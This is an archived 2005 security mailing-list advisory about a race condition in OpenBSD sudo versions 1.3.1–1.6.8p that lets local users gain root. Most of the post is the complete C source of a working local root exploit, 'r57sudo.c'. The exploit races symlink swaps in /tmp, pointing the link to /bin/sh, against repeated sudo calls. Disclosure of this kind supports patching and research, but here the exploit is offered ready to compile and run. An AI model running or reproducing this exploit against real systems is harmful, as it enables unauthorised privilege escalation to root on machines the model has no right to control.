Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [UNIX] sudo Pathname Validation Race Condition (Exploit) |
|---|---|
| Date: | 6 Jul 2005 15:04:29 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - sudo Pathname Validation Race Condition (Exploit) ------------------------------------------------------------------------ SUMMARY sudo (superuser do) is "a program written for UNIX, Linux, and similar operating systems that allows users to run programs in the guise of another user (normally in the guise of the system's superuser)". A race condition in sudo whenever it tries to validates file pathname allows local attackers to gain elevated privileges. DETAILS Vulnerable Systems: * OpenBSD sudo versions 1.3.1 - 1.6.8p Exploit: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sysexits.h> #include <sys/wait.h> #define SUDO "/usr/bin/sudo" #ifdef BUFSIZ #undef BUFSIZ #define BUFSIZ 128 #endif /* ANY MODIFIED REPUBLISHING IS RESTRICTED OpenBSD sudo 1.3.1 - 1.6.8p local root exploit Tested under OpenBSD 3.6 sudo 1.6.7p5 Vuln by OpenBSD errata, http://www.openbsd.org/errata.html (c)oded by __blf 2005 RusH Security Team, http://rst.void.ru Race condition in path name, can take a while to exploit Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince Fck lamerz: Saint_I, nmalykh All rights reserved. ANY MODIFIED REPUBLISHING IS RESTRICTED */ int main (int argc, char ** argv) { pid_t pid; void * buffer; char * exec, * race, * path; if(argc != 3) { fprintf(stderr, "r57sudo.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s <sudo full path command> <sudo command>\n", argv[0]); fprintf(stderr, "e.g. ./r57sudo /bin/ls ls\n"); return EX_USAGE; } pid = fork(); if(pid == 0) { while(1) { exec = (char *)calloc(BUFSIZ, sizeof(char)); race = (char *)calloc(BUFSIZ, sizeof(char)); bzero(exec, sizeof(exec)); snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]); system((char *)exec); bzero(race, sizeof(race)); snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); system((char *)race); bzero(race, sizeof(race)); snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]); system((char *)race); bzero(race, sizeof(race)); snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); system((char *)race); } } if(pid > 0) { while(1) { path = (char *)calloc(BUFSIZ/2, sizeof(char)); snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]); system((char *)path); } } } ADDITIONAL INFORMATION The original article can be found at: <http://rst.void.ru/download/r57sudo.c> http://rst.void.ru/download/r57sudo.c The information has been provided by <mailto:http://rst.void.ru> __blf. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [NEWS] Popper Insecure Temporary File Creation, SecuriTeam |
|---|---|
| Next by Date: | [TOOL] N-View - Network Monitor, SecuriTeam |
| Previous by Thread: | [NEWS] Popper Insecure Temporary File Creation, SecuriTeam |
| Next by Thread: | [TOOL] N-View - Network Monitor, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |